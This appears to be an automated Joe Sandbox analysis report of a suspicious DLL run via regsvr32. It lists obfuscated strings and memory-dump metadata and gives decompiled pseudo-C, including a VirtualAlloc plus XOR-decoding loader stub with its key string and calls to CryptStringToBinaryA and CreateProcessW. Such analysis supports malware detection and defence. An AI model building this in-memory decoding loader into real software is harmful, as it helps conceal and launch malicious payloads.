Rmm, xrefs: 00007FFD2B062775
0.$, xrefs: 00007FFD2B061F5F
5qWe, xrefs: 00007FFD2B062239
`)O, xrefs: 00007FFD2B0633AF
bn<, xrefs: 00007FFD2B063071
\xE8, xrefs: 00007FFD2B061FFF
)\]*, xrefs: 00007FFD2B061E29
uRO, xrefs: 00007FFD2B0626D5
P$s, xrefs: 00007FFD2B06224D
4]_E, xrefs: 00007FFD2B062991
cdVx, xrefs: 00007FFD2B062487
mxtx, xrefs: 00007FFD2B062C39
Rx-|, xrefs: 00007FFD2B062ED7
aqxH, xrefs: 00007FFD2B06346D
xK8, xrefs: 00007FFD2B0626A3
VdVy, xrefs: 00007FFD2B062423
dwW, xrefs: 00007FFD2B062941
xm#_, xrefs: 00007FFD2B06321F
`V1, xrefs: 00007FFD2B062F77
F%hy, xrefs: 00007FFD2B06300D
kblv, xrefs: 00007FFD2B0622C5
w !, xrefs: 00007FFD2B062E05
qw/D, xrefs: 00007FFD2B06328D
_hc1, xrefs: 00007FFD2B062CD9
R'_, xrefs: 00007FFD2B0622CF
@W[e, xrefs: 00007FFD2B0621D5
42We, xrefs: 00007FFD2B06229D
F0y@, xrefs: 00007FFD2B06217B
,w O, xrefs: 00007FFD2B062A45
p(mI, xrefs: 00007FFD2B062F63
3sM, xrefs: 00007FFD2B061FE1
iBnv, xrefs: 00007FFD2B062EE1
dwW!, xrefs: 00007FFD2B062685
wWe, xrefs: 00007FFD2B0626E9
n%F, xrefs: 00007FFD2B06253B
zK8, xrefs: 00007FFD2B06276B
_mc=, xrefs: 00007FFD2B062121
1v?!, xrefs: 00007FFD2B061E3D
,w!, xrefs: 00007FFD2B0632DD
vXG8, xrefs: 00007FFD2B061F9B
0]#&, xrefs: 00007FFD2B061E5B
\U7, xrefs: 00007FFD2B0622F7
y,, xrefs: 00007FFD2B06272F
I0tx, xrefs: 00007FFD2B0621AD

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Load$Message$StringTranslateUninitialize$AcceleratorClassCreateCursorDispatchInitializeLibraryRegisterWindow
String ID: x%8$%4^*$)\]*$,w O$,w!$0]#&$0kiK$0.$$1v?!$42We$4IRH$4]_E$5qWe$<IE$@W[e$E(jX$F%hy$F0y@$I0tx$P$s$Rmm$Rx-|$VdVy$\xE8$\U7$]yO$]oo$_$9$_hc1$_mc=$_{c=$`)O$`RZD$aqxH$bxKq$cdVx$dwW!$dwW$iBnv$kblv$m)H$md"o$mxtx$n%F$p(mI$qw/D$uRO$vXG8$w !$x!t$xm#_$xmbE$y,$%hy$3sM$4j@$8g$$R'_$`V1$bn<$sN $wWe$xK8$zK8
API String ID: 254501832-2356253762
Opcode ID: 0d6d952f62c7adb4f9865d32e7c8a7390ab0e42aef8034d5f357c6e5d33e8435
Instruction ID: 78b34535cdbf635f5a65325dfa53178d3177b48cce13aa2eaecad6e45d91f8c0
Opcode Fuzzy Hash: 0d6d952f62c7adb4f9865d32e7c8a7390ab0e42aef8034d5f357c6e5d33e8435
Instruction Fuzzy Hash: 1CD2B8B290A7C5CFE371CF229E957DD3AA1F342748F508218C2991FA29CB799245CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B061A2C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00007FFD7FFD2B061A2C(void* __edx, signed char __rbx, void* __rcx, signed char __rdi, signed char __rsi, signed char __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed int _t17;
				signed char _t26;
				void* _t38;
				void* _t40;
				signed char* _t44;
				signed long long _t56;
				signed char* _t66;
				signed char* _t69;
				void* _t72;

				_t44 = _t66;
				_t44[8] = __rbx;
				_t44[0x10] = __rbp;
				_t44[0x18] = __rsi;
				_t44[0x20] = __rdi;
				r12d = __edx;
				__imp__CoLoadLibrary();
				_t56 = "VirtualAlloc";
				_t17 = E00007FFD7FFD2B063714(_t38, _t40, __rbx, _t44, _t56);
				E00007FFD7FFD2B06525C();
				E00007FFD7FFD2B06525C();
				E00007FFD7FFD2B06525C();
				r9d = _t17;
				r8d = _t17 | _t17; // executed
				VirtualAlloc(_t72, ??, ??); // executed
				r8d = 0;
				if (_t44 == 0) goto 0x2b061af8;
				if (r12d == 0) goto 0x2b061af5;
				_t69 = _t44;
				r8d = r8d + 1;
				_t26 =  *(r8d - (_t56 + _t56 * 4 << 3) + "uRODSdV1dwWeU0j@_hcuRxK8R%hycF!_mx1Kxmb") ^ _t69[__rcx - _t44];
				 *_t69 = _t26;
				if (r8d - r12d < 0) goto 0x2b061ab9;
				return _t26;
			}

0x7ffd2b061a2c
0x7ffd2b061a2f
0x7ffd2b061a33
0x7ffd2b061a37
0x7ffd2b061a3b
0x7ffd2b061a48
0x7ffd2b061a54
0x7ffd2b061a5a
0x7ffd2b061a64
0x7ffd2b061a73
0x7ffd2b061a81
0x7ffd2b061a8f
0x7ffd2b061a99
0x7ffd2b061a9e
0x7ffd2b061aa1
0x7ffd2b061aa3
0x7ffd2b061aac
0x7ffd2b061ab1
0x7ffd2b061ab3
0x7ffd2b061ace
0x7ffd2b061ae6
0x7ffd2b061aea
0x7ffd2b061af3
0x7ffd2b061b12

APIs

CoLoadLibrary.OLE32 ref: 00007FFD2B061A54
VirtualAlloc.KERNELBASE ref: 00007FFD2B061AA1

Strings

4096, xrefs: 00007FFD2B061A86
8192, xrefs: 00007FFD2B061A78
gfff, xrefs: 00007FFD2B061AB9
VirtualAlloc, xrefs: 00007FFD2B061A5A
uRODSdV1dwWeU0j@_hcuRxK8R%hycF!_mx1Kxmb, xrefs: 00007FFD2B061ADC
kernel32.dll, xrefs: 00007FFD2B061A4B

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID: 4096$8192$VirtualAlloc$gfff$kernel32.dll$uRODSdV1dwWeU0j@_hcuRxK8R%hycF!_mx1Kxmb
API String ID: 3550616410-61892301
Opcode ID: 94780e6cfa56ae025324f8f2b37d746abeccf2a3851669e3a2d9421e6644817d
Instruction ID: 609d799697d0855264790cfcb9330bba2439fa85ce23a77e099b818e51658a4c
Opcode Fuzzy Hash: 94780e6cfa56ae025324f8f2b37d746abeccf2a3851669e3a2d9421e6644817d
Instruction Fuzzy Hash: 6721FC21B1774689EB05DB6AAD611783790FB8EF80B485135DA4D837A1EF7CE441D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06596C Relevance: 10.6, APIs: 7, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00007FFD7FFD2B06596C(void* __edx, intOrPtr* __rax, long long __r8, long long _a24) {
				void* __rbx;
				void* _t4;
				void* _t14;
				intOrPtr _t17;
				void* _t19;
				void* _t25;
				void* _t30;
				void* _t35;
				void* _t38;
				void* _t48;
				intOrPtr* _t57;
				long long _t58;
				intOrPtr* _t59;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				_t70 = __r8;
				_t57 = __rax;
				_t35 = __edx;
				_a24 = __r8;
				_t58 = __r8;
				if (__edx != 1) goto 0x2b0659fb; // executed
				_t4 = E00007FFD7FFD2B0675D0(__rax); // executed
				if (_t4 != 0) goto 0x2b06598e;
				goto 0x2b065ab8;
				if (E00007FFD7FFD2B068104(__rax, _t62, _t64, _t65) != 0) goto 0x2b06599e;
				E00007FFD7FFD2B067628();
				goto 0x2b065987;
				E00007FFD7FFD2B0689C4(_t58);
				GetCommandLineA();
				 *0x2b0c9fc8 = _t57;
				E00007FFD7FFD2B0688D0(_t38, _t58, _t64, _t65, _t66);
				 *0x2b0c8aa8 = _t57;
				if (E00007FFD7FFD2B068188(_t57, _t58, _t62, _t64) >= 0) goto 0x2b0659cc;
				E00007FFD7FFD2B067DF8(_t58, _t60, _t62);
				goto 0x2b065997;
				if (E00007FFD7FFD2B0687D8(_t58, _t65, _t70) < 0) goto 0x2b0659f4; // executed
				_t14 = E00007FFD7FFD2B0684D0(_t30, _t57, _t58, _t62, _t65, _t66); // executed
				if (_t14 < 0) goto 0x2b0659f4;
				if (E00007FFD7FFD2B067060(0, _t57, _t58, _t70) != 0) goto 0x2b0659f4;
				 *0x2b0c8aa0 =  *0x2b0c8aa0 + 1;
				goto 0x2b065ab3;
				E00007FFD7FFD2B06845C(_t15, _t58, _t65);
				goto 0x2b0659c5;
				if (_t35 != 0) goto 0x2b065a4c;
				_t17 =  *0x2b0c8aa0; // 0x0
				if (_t17 <= 0) goto 0x2b065987;
				 *0x2b0c8aa0 = _t17 - 1;
				_t48 =  *0x2b0c908c - _t35; // 0x1
				if (_t48 != 0) goto 0x2b065a22;
				_t19 = E00007FFD7FFD2B0672B8(_t58, _t62, _t70);
				if (_t58 != 0) goto 0x2b065a37;
				E00007FFD7FFD2B06845C(_t19, _t58, _t65);
				E00007FFD7FFD2B067DF8(_t58, _t60, _t62);
				E00007FFD7FFD2B067628();
				if (_t58 != 0) goto 0x2b065ab3;
				if ( *0x2b0c7610 == 0xffffffff) goto 0x2b065ab3;
				E00007FFD7FFD2B067DF8(_t58, _t60, _t62);
				goto 0x2b065ab3;
				if (_t35 != 2) goto 0x2b065aa7;
				E00007FFD7FFD2B067DEC();
				_t25 = E00007FFD7FFD2B06796C(_t58, _t60, _t62, _t64, _t65, _t66); // executed
				_t59 = _t57;
				if (_t57 == 0) goto 0x2b065987;
				__imp__FlsSetValue();
				if (_t25 == 0) goto 0x2b065a9d;
				E00007FFD7FFD2B067E20(_t59, _t59, _t57);
				 *_t59 = GetCurrentThreadId();
				 *(_t59 + 8) =  *(_t59 + 8) | 0xffffffff;
				goto 0x2b065ab3;
				free(??);
				goto 0x2b065987;
				if (0 != 3) goto 0x2b065ab3;
				E00007FFD7FFD2B0680B4(_t57, _t59);
				return 1;
			}

0x7ffd2b06596c
0x7ffd2b06596c
0x7ffd2b06596c
0x7ffd2b06596c
0x7ffd2b065976
0x7ffd2b06597c
0x7ffd2b06597e
0x7ffd2b065985
0x7ffd2b065989
0x7ffd2b065995
0x7ffd2b065997
0x7ffd2b06599c
0x7ffd2b06599e
0x7ffd2b0659a3
0x7ffd2b0659a9
0x7ffd2b0659b0
0x7ffd2b0659b5
0x7ffd2b0659c3
0x7ffd2b0659c5
0x7ffd2b0659ca
0x7ffd2b0659d3
0x7ffd2b0659d5
0x7ffd2b0659dc
0x7ffd2b0659e7
0x7ffd2b0659e9
0x7ffd2b0659ef
0x7ffd2b0659f4
0x7ffd2b0659f9
0x7ffd2b0659fd
0x7ffd2b0659ff
0x7ffd2b065a07
0x7ffd2b065a0f
0x7ffd2b065a15
0x7ffd2b065a1b
0x7ffd2b065a1d
0x7ffd2b065a25
0x7ffd2b065a27
0x7ffd2b065a2c
0x7ffd2b065a31
0x7ffd2b065a3a
0x7ffd2b065a43
0x7ffd2b065a45
0x7ffd2b065a4a
0x7ffd2b065a4f
0x7ffd2b065a51
0x7ffd2b065a60
0x7ffd2b065a65
0x7ffd2b065a6b
0x7ffd2b065a7a
0x7ffd2b065a85
0x7ffd2b065a89
0x7ffd2b065a94
0x7ffd2b065a96
0x7ffd2b065a9b
0x7ffd2b065a9d
0x7ffd2b065aa2
0x7ffd2b065aaa
0x7ffd2b065aae
0x7ffd2b065abd

APIs

Part of subcall function 00007FFD2B0675D0: HeapCreate.KERNELBASE ref: 00007FFD2B0675E6
Part of subcall function 00007FFD2B0675D0: GetVersion.KERNEL32 ref: 00007FFD2B0675F8
Part of subcall function 00007FFD2B0675D0: HeapSetInformation.KERNEL32 ref: 00007FFD2B067616

_RTC_Initialize.LIBCMT ref: 00007FFD2B06599E
GetCommandLineA.KERNEL32 ref: 00007FFD2B0659A3

Part of subcall function 00007FFD2B0688D0: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B0688E9
Part of subcall function 00007FFD2B0688D0: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B068940
Part of subcall function 00007FFD2B0688D0: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B06897B
Part of subcall function 00007FFD2B0688D0: free.LIBCMT ref: 00007FFD2B068988
Part of subcall function 00007FFD2B0688D0: FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD2B0659B5), ref: 00007FFD2B068993

Part of subcall function 00007FFD2B068188: GetStartupInfoW.KERNEL32 ref: 00007FFD2B0681A9

__setargv.LIBCMT ref: 00007FFD2B0659CC
_cinit.LIBCMT ref: 00007FFD2B0659E0

Part of subcall function 00007FFD2B067DF8: FlsFree.KERNEL32(?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B067E07
Part of subcall function 00007FFD2B067DF8: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B069563
Part of subcall function 00007FFD2B067DF8: free.LIBCMT ref: 00007FFD2B06956C
Part of subcall function 00007FFD2B067DF8: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFD2B065A4A), ref: 00007FFD2B069593

Part of subcall function 00007FFD2B06845C: free.LIBCMT ref: 00007FFD2B0684AD

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

FlsSetValue.KERNEL32 ref: 00007FFD2B065A7A
GetCurrentThreadId.KERNEL32 ref: 00007FFD2B065A8E
free.LIBCMT ref: 00007FFD2B065A9D

Part of subcall function 00007FFD2B06640C: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066422
Part of subcall function 00007FFD2B06640C: _errno.LIBCMT ref: 00007FFD2B06642C
Part of subcall function 00007FFD2B06640C: GetLastError.KERNEL32(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066434

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$ByteCharCriticalDeleteEnvironmentFreeHeapMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLinePrivilegeReleaseSleepStartupThreadValueVersion__setargv_cinit_errno
String ID:
API String ID: 3717519922-0
Opcode ID: 3581c454eeaa65c887dbeccdfa567d82ef0e107ff0199405c75cbb276c5ba23c
Instruction ID: 789ec3d7e12cb44e6766947fdaa2737e3163c3e288ddfff26250cd3388566f32
Opcode Fuzzy Hash: 3581c454eeaa65c887dbeccdfa567d82ef0e107ff0199405c75cbb276c5ba23c
Instruction Fuzzy Hash: 6F31E220F0B2078DFA676B614F632BD21905F13320F144636DA5D851F3EEACB440BAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0652E4 Relevance: 7.5, APIs: 5, Instructions: 47
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00007FFD7FFD2B0652E4(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t7;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				void* _t39;

				_t25 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t28 = __rcx;
				if (__rcx - 0xffffffe0 > 0) goto 0x2b065378;
				_t35 =  !=  ? __rcx : _t34;
				_t31 =  *0x2b0c96c8; // 0xbe0000
				if (_t31 != 0) goto 0x2b065334;
				E00007FFD7FFD2B06758C();
				E00007FFD7FFD2B06732C(0x1e, _t31, __rcx, __rsi, _t39);
				E00007FFD7FFD2B066F0C();
				_t7 = RtlAllocateHeap(??, ??, ??); // executed
				if (_t25 != 0) goto 0x2b065373;
				if ( *0x2b0c96d8 == _t7) goto 0x2b06535d;
				if (E00007FFD7FFD2B067880(_t25, _t28) == 0) goto 0x2b065368;
				goto 0x2b065308;
				E00007FFD7FFD2B067698(_t25);
				 *_t25 = 0xc;
				E00007FFD7FFD2B067698(_t25);
				 *_t25 = 0xc;
				_t26 = _t25;
				goto 0x2b06538a;
				E00007FFD7FFD2B067880(_t26, _t28);
				E00007FFD7FFD2B067698(_t26);
				 *_t26 = 0xc;
				return 0;
			}

0x7ffd2b0652e4
0x7ffd2b0652e4
0x7ffd2b0652e9
0x7ffd2b0652f3
0x7ffd2b0652fa
0x7ffd2b065304
0x7ffd2b065308
0x7ffd2b065312
0x7ffd2b065314
0x7ffd2b06531e
0x7ffd2b065328
0x7ffd2b065339
0x7ffd2b065345
0x7ffd2b06534d
0x7ffd2b065359
0x7ffd2b06535b
0x7ffd2b06535d
0x7ffd2b065362
0x7ffd2b065368
0x7ffd2b06536d
0x7ffd2b065373
0x7ffd2b065376
0x7ffd2b065378
0x7ffd2b06537d
0x7ffd2b065382
0x7ffd2b065399

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FFD2B065314
RtlAllocateHeap.NTDLL(?,?,?,00007FFD2B064F2A,?,?,?,00007FFD2B064FA4), ref: 00007FFD2B065339
_errno.LIBCMT ref: 00007FFD2B06535D
_errno.LIBCMT ref: 00007FFD2B065368
_errno.LIBCMT ref: 00007FFD2B06537D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$AllocateHeap
String ID:
API String ID: 502529563-0
Opcode ID: 7709ba9f006bae7f99be5d8f8ca6756eeb13fe1dbf17b5e84122e3cd410d4b7d
Instruction ID: a08c8c9de8fbb673dbc0d4980854ef724bed26561eb3c1cae1bb1ae96c3f2c17
Opcode Fuzzy Hash: 7709ba9f006bae7f99be5d8f8ca6756eeb13fe1dbf17b5e84122e3cd410d4b7d
Instruction Fuzzy Hash: 95113021F0B3578DFA175B61AE2227C2250AF86B90F444630EF6D063F2DEFCA440A791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B061B14 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoLoadLibrary.OLE32 ref: 00007FFD2B061B41

Strings

crypt32.dll, xrefs: 00007FFD2B061B32
CryptStringToBinaryA, xrefs: 00007FFD2B061B47

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID: CryptStringToBinaryA$crypt32.dll
API String ID: 1029625771-1448144620
Opcode ID: 129d98ac87f64c6071855cc89d158c5e72cae8d546f0e331efb10c5967aa142e
Instruction ID: 5e3de7a3c95e2cac71910dae2b097a467e8094aebd20a2cea375ea5c738249a6
Opcode Fuzzy Hash: 129d98ac87f64c6071855cc89d158c5e72cae8d546f0e331efb10c5967aa142e
Instruction Fuzzy Hash: 1A11C032B0AB4586D751CF16B91176A72E0FB89B84F048134EE8D47B54EF3CD911D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0684D0 Relevance: 4.6, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00007FFD7FFD2B0684D0(void* __ecx, long long __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				signed int _t11;
				void* _t16;
				void* _t26;
				long long _t38;
				signed long long _t41;
				char* _t43;
				void* _t53;
				void* _t55;
				long long* _t56;

				_t58 = __rsi;
				_t53 = __rdx;
				_t38 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if ( *0x2b0c9fb8 != 0) goto 0x2b0684f2;
				_t11 = E00007FFD7FFD2B070F6C();
				_t41 =  *0x2b0c8aa8; // 0x0
				if (_t41 != 0) goto 0x2b06851b;
				goto 0x2b0685bc;
				if ((_t11 | 0xffffffff) == 0x3d) goto 0x2b06850e;
				E00007FFD7FFD2B0653B0(_t11 | 0xffffffff, _t41);
				if ( *((intOrPtr*)(_t41 + _t38 + 1)) != 0) goto 0x2b068508;
				_t6 = _t55 + 1; // 0x1
				_t16 = E00007FFD7FFD2B06796C(_t41 + _t38 + 1, _t6, _t53, _t55, __rsi, __rbp); // executed
				_t56 = _t38;
				 *0x2b0c9058 = _t38;
				if (_t38 == 0) goto 0x2b068500;
				_t43 =  *0x2b0c8aa8; // 0x0
				if ( *_t43 == 0) goto 0x2b06859c;
				E00007FFD7FFD2B0653B0(_t16, _t43);
				_t7 = _t38 + 1; // 0x1
				_t26 = _t7;
				if ( *_t43 == 0x3d) goto 0x2b06858a;
				E00007FFD7FFD2B06796C(_t43, _t26, _t53, _t56, _t58, _t26);
				 *_t56 = _t38;
				if (_t38 == 0) goto 0x2b0685e7;
				if (E00007FFD7FFD2B066870(_t38, _t38, _t26, _t43) != 0) goto 0x2b0685d1;
				if ( *((char*)(_t43 + _t26)) != 0) goto 0x2b06854c;
				free(??);
				 *0x2b0c8aa8 =  *0x2b0c8aa8 & 0x00000000;
				 *(_t56 + 8) =  *(_t56 + 8) & 0x00000000;
				 *0x2b0c9fa0 = 1;
				return 0;
			}

0x7ffd2b0684d0
0x7ffd2b0684d0
0x7ffd2b0684d0
0x7ffd2b0684d0
0x7ffd2b0684d5
0x7ffd2b0684da
0x7ffd2b0684eb
0x7ffd2b0684ed
0x7ffd2b0684f2
0x7ffd2b0684fe
0x7ffd2b068503
0x7ffd2b06850a
0x7ffd2b068511
0x7ffd2b06851f
0x7ffd2b068521
0x7ffd2b06852c
0x7ffd2b068531
0x7ffd2b068534
0x7ffd2b06853e
0x7ffd2b068540
0x7ffd2b06854a
0x7ffd2b06854f
0x7ffd2b068557
0x7ffd2b068557
0x7ffd2b06855a
0x7ffd2b068567
0x7ffd2b06856c
0x7ffd2b068572
0x7ffd2b068584
0x7ffd2b068593
0x7ffd2b06859f
0x7ffd2b0685a4
0x7ffd2b0685ac
0x7ffd2b0685b0
0x7ffd2b0685d0

APIs

__initmbctable.LIBCMT ref: 00007FFD2B0684ED
free.LIBCMT ref: 00007FFD2B06859F
free.LIBCMT ref: 00007FFD2B0685EE

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$__initmbctable
String ID:
API String ID: 2804101511-0
Opcode ID: 08db8f476880d57e069c062042d4a10b4ec91f1240d7a9d6f40a12bf27d40e26
Instruction ID: 4ed821f68e101f20c3a36310672a09e2567c34e51d5cc68ebf4c73cd5b2b320a
Opcode Fuzzy Hash: 08db8f476880d57e069c062042d4a10b4ec91f1240d7a9d6f40a12bf27d40e26
Instruction Fuzzy Hash: E231C821F0E75249FB579F11AE223B56390AF47B40F184135DA4C066E6EFBCF441AB88

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D93C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018001DAF0

Strings

2y, xrefs: 000000018001DA0C

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 2y
API String ID: 963392458-2238746390
Opcode ID: 043d7bb3bb5bc427a1cf4fe11f7da4be06e278070db963a4d042fa6ecd32c9f3
Instruction ID: a5f9c5da41c4416b3c5c2b2d7882b63f96947196cfe32bd66f81c6794674ef04
Opcode Fuzzy Hash: 043d7bb3bb5bc427a1cf4fe11f7da4be06e278070db963a4d042fa6ecd32c9f3
Instruction Fuzzy Hash: 3F512A7051CB858FD7B8DF18D0897AABBE0FB98315F10491EE48DC7251DB749884CB86

Uniqueness

Uniqueness Score: -1.00%

